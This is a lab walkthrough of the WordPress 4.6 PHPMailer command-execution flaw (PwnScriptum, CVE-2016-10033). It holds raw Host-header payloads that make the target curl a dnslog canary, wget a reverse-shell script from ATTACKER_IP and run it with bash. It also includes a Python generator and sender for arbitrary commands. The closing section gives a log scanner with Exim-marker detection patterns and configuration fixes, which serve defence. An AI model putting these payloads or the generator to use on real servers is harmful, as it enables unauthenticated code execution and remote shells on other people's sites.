WordPress 4.6 Arbitrary Command Execution Vulnerability



WordPress 4.6 Arbitrary Command Execution Vulnerability (PwnScriptum)

WordPress sends mail, including the password-reset e-mail triggered from the lost-password form, through its bundled PHPMailer component. wp_mail() builds the From address as wordpress@<SERVER_NAME>, and Apache fills SERVER_NAME from the request's Host header, so the attacker controls the sender address. Vulnerable PHPMailer versions hand that address to the local sendmail binary as the -f (envelope sender) argument without escaping it properly. When the MTA behind sendmail is Exim, the attacker can smuggle in the -be switch (Exim's string-expansion test mode) followed by an expansion string: ${run{...}} executes a command, and ${substr{...}} expansions supply the characters the address is not allowed to contain. The result is unauthenticated remote command execution. The underlying PHPMailer bug is known as PwnScriptum (CVE-2016-10033); note that the -be and ${run{}} tricks are Exim-specific, so the target must be using Exim as its MTA.


Lab environment

First download the environment. The vulhub project on GitHub provides a ready-made Docker environment for this bug, which we use directly (GitHub no longer serves the unauthenticated git:// protocol, so clone over https):

git clone https://github.com/vulhub/vulhub.git
cd vulhub/wordpress/pwnscriptum/
docker-compose up -d

Visit http://IP:8080/ and the WordPress installation page appears.


Affected versions

WordPress <= 4.6.0

PHPMailer < 5.2.18


Reproduction

Complete the WordPress installation with the default settings.

The vulnerability is reached through the lost-password page. The request below tests whether it is present; user_login must be an account (or its e-mail address) that actually exists on your install, otherwise WordPress never sends mail and the sendmail call is never made. Two characters cannot appear literally in the injected Host value: a space, because the unescaped sender is split on whitespace when it reaches sendmail's command line, and a slash, which PHPMailer's address validation rejects. Exim's own expansion syntax supplies both: $spool_directory expands to an absolute path such as /var/spool/exim4, so ${substr{0}{1}{$spool_directory}} yields /, and $tod_log expands to a timestamp of the form 2016-12-25 10:00:00, so ${substr{10}{1}{$tod_log}} (offset 10, length 1) yields a space. Also keep the command entirely lowercase: wp_mail() lowercases SERVER_NAME before building the From address.

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: edi(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}curl${substr{10}{1}{$tod_log}}wb5hh4.dnslog.cn}} null)
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept: */*
Content-Length: 63
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=admin@qq.com

After sending the request, the dnslog service records a lookup for wb5hh4.dnslog.cn, which proves the curl command ran on the target and the vulnerability exists.

Next, start a web server on the attacker machine (port 80) hosting the reverse-shell script as edi.txt.

Send the following payload to make the target download that script to /tmp/shell (replace ATTACKER_IP with the address of the web server).

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: edi(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell${substr{10}{1}{$tod_log}}ATTACKER_IP${substr{0}{1}{$spool_directory}}edi.txt}} null)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Origin: http://192.168.200.23:8080
Connection: close
Referer: http://192.168.200.23:8080/wp-login.php?action=lostpassword
Cookie: ECS[visit_times]=9; wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1

user_login=admin%40qq.com&redirect_to=&wp-submit=%E8%8E%B7%E5%8F%96%E6%96%B0%E5%AF%86%E7%A0%81

The web server listening on port 80 logs a request for the script, so the wget command above executed on the target.

On the attacker machine, start a listener on port 1234 (the port the reverse-shell script connects back to).

Send the payload below to make the target execute the downloaded script.

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: edi(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell}} null)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Origin: http://192.168.200.23:8080
Connection: close
Referer: http://192.168.200.23:8080/wp-login.php?action=lostpassword
Cookie: ECS[visit_times]=9; wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1

user_login=admin%40qq.com&redirect_to=&wp-submit=%E8%8E%B7%E5%8F%96%E6%96%B0%E5%AF%86%E7%A0%81

The reverse shell connects back: exploitation succeeded.
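The three Host headers above are built by hand, which is error-prone. The following script is an added example, not code from the original post: it generates the Exim expansion payload from a plain shell command (substituting the slash and space expansions, and refusing characters that would not survive the WordPress to PHPMailer to Exim path), wraps it in the Host value the post uses, and assembles the lost-password POST with a correct Content-Length. The label "edi", the attacker IP 192.168.200.23 and the dnslog domain are taken from the post; the account admin@qq.com and the target address in send_lost_password() are assumptions for the lab.

```python
"""Build PwnScriptum (CVE-2016-10033) Host-header payloads for the WordPress
lost-password form. Added example; not the original post's code."""
import http.client
import urllib.parse

# Exim expansion items that yield the two characters the injected address
# cannot carry literally: a space would split sendmail's argv, and a slash
# is rejected by PHPMailer's address validation.
SLASH = "${substr{0}{1}{$spool_directory}}"  # $spool_directory is an absolute path, char 0 is '/'
SPACE = "${substr{10}{1}{$tod_log}}"          # $tod_log is "YYYY-MM-DD HH:MM:SS", char 10 is ' '


def exim_encode(command: str) -> str:
    """Rewrite a shell command so it reaches Exim intact via the Host header."""
    for ch in command:
        if ch in "{}$":
            # These are Exim expansion syntax and would be parsed, not passed through.
            raise ValueError(f"{ch!r} cannot appear inside ${{run{{...}}}}")
        if ch.isupper():
            # wp_mail() lowercases SERVER_NAME before building wordpress@<host>.
            raise ValueError("uppercase letters are lowercased by WordPress")
    return command.replace("/", SLASH).replace(" ", SPACE)


def build_host_header(command: str, label: str = "edi") -> str:
    """Wrap the encoded command in the Host value used in the post.

    The parenthesised part is an RFC 5322 comment, so PHPMailer accepts the
    address; sendmail then sees the pieces as extra switches: -froot@localhost
    re-sets the envelope sender and -be puts Exim in expansion-test mode,
    where ${run{...}} executes the command.
    """
    return label + "(any -froot@localhost -be ${run{" + exim_encode(command) + "}} null)"


def _form_body(user_login: str) -> str:
    return urllib.parse.urlencode(
        {"wp-submit": "Get New Password", "redirect_to": "", "user_login": user_login}
    )


def build_request(host_header: str, user_login: str) -> bytes:
    """Raw POST to wp-login.php?action=lostpassword with a matching Content-Length."""
    body = _form_body(user_login)
    head = "\r\n".join([
        "POST /wp-login.php?action=lostpassword HTTP/1.1",
        "Host: " + host_header,
        "Connection: close",
        "Content-Type: application/x-www-form-urlencoded",
        "Content-Length: " + str(len(body)),
    ])
    return (head + "\r\n\r\n" + body).encode()


def exploit_chain(attacker_ip: str, dnslog_domain: str) -> dict:
    """The three Host values from the post, in order: DNS canary, stage script, run it."""
    return {
        "probe": build_host_header("/usr/bin/curl " + dnslog_domain),
        "stage": build_host_header(
            "/usr/bin/wget --output-document /tmp/shell " + attacker_ip + "/edi.txt"),
        "run": build_host_header("/bin/bash /tmp/shell"),
    }


def send_lost_password(target_ip: str, port: int, host_header: str, user_login: str) -> int:
    """Send one request to the lab target and return the HTTP status (needs the lab network)."""
    body = _form_body(user_login)
    conn = http.client.HTTPConnection(target_ip, port, timeout=10)
    conn.putrequest("POST", "/wp-login.php?action=lostpassword", skip_host=True)
    conn.putheader("Host", host_header)  # http.client only rejects CR/LF, so the payload passes
    conn.putheader("Content-Type", "application/x-www-form-urlencoded")
    conn.putheader("Content-Length", str(len(body)))
    conn.endheaders(body.encode())
    status = conn.getresponse().status
    conn.close()
    return status


if __name__ == "__main__":
    # Lab values from the post; the target address 192.168.200.23:8080 is assumed.
    for step, host in exploit_chain("192.168.200.23", "wb5hh4.dnslog.cn").items():
        print(step, host)
        # send_lost_password("192.168.200.23", 8080, host, "admin@qq.com")
```

Running the script prints the three Host values; uncomment the send_lost_password() call to fire them one at a time against the lab container, waiting for the dnslog hit and the web-server access-log entry between steps as the post does.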
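From the defender's side, the injected Host header is the thing to watch for: it is never a syntactically valid hostname, and the Exim markers (-be, ${run{, ${substr{) stand out. The script below is an added example, not from the original post: it scans Apache access-log lines that include the Host header and flags requests whose Host value is either a PwnScriptum-style expansion or simply not a valid host[:port]. The log format (assumed to be LogFormat "%h %t \"%r\" %>s \"%{Host}i\"") and the sample lines are constructed for illustration.

```python
"""Flag PwnScriptum-style Host headers in access-log lines. Added example;
the log format and SAMPLE_LOG entries are constructed, not real traffic."""
import re

# Assumed Apache format: %h %t "%r" %>s "%{Host}i"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) "(?P<host>.*)"$'
)
# RFC 1123 hostname or IPv4 literal, optional :port
HOST_RE = re.compile(
    r'^[a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)*(?::\d{1,5})?$',
    re.I,
)
# Bracketed IPv6 literal, optional :port
IPV6_RE = re.compile(r'^\[[0-9a-f:.]+\](?::\d{1,5})?$', re.I)
# Exim expansion syntax and sendmail switches seen in the exploit's Host value
EXIM_MARKERS = ("${run{", "${substr{", "-be ", " -f")

# Constructed sample: a normal GET, the post's probe payload, a clean POST,
# and a Host value that is merely malformed.
SAMPLE_LOG = [
    '10.0.0.5 [25/Dec/2016:10:00:01 +0000] "GET /wp-login.php?action=lostpassword HTTP/1.1" 200 "192.168.200.23:8080"',
    '10.0.0.5 [25/Dec/2016:10:00:07 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 200 '
    '"edi(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin'
    '${substr{0}{1}{$spool_directory}}curl${substr{10}{1}{$tod_log}}wb5hh4.dnslog.cn}} null)"',
    '10.0.0.9 [25/Dec/2016:10:01:00 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 200 "blog.example.com"',
    '10.0.0.7 [25/Dec/2016:10:02:00 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 200 "blog example.com"',
]


def classify_host(host: str) -> str:
    """Return '' for a benign Host value, otherwise a short reason string."""
    h = host.strip()
    for marker in EXIM_MARKERS:
        if marker in h:
            return "exim-expansion:" + marker.strip()
    if HOST_RE.match(h) or IPV6_RE.match(h):
        return ""
    # Not a hostname at all: still worth a look, since any wp_mail() path
    # (registration, comment notifications) would carry the same sender.
    return "malformed-host"


def scan(lines) -> list:
    """Return (client_ip, reason, request_line) for every suspicious line."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the assumed format; skip rather than guess
        reason = classify_host(m["host"])
        if reason:
            hits.append((m["ip"], reason, m["req"]))
    return hits


if __name__ == "__main__":
    for ip, reason, req in scan(SAMPLE_LOG):
        print(f"{ip}\t{reason}\t{req}")
```

Beyond detection, two configuration facts close this path regardless of the PHPMailer version: with UseCanonicalName On and an explicit ServerName, Apache fills SERVER_NAME from its configuration rather than from the client's Host header, so wp_mail() never sees attacker input; and if the local sendmail binary is not Exim, the -be switch and ${run{}} expansion have no effect.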

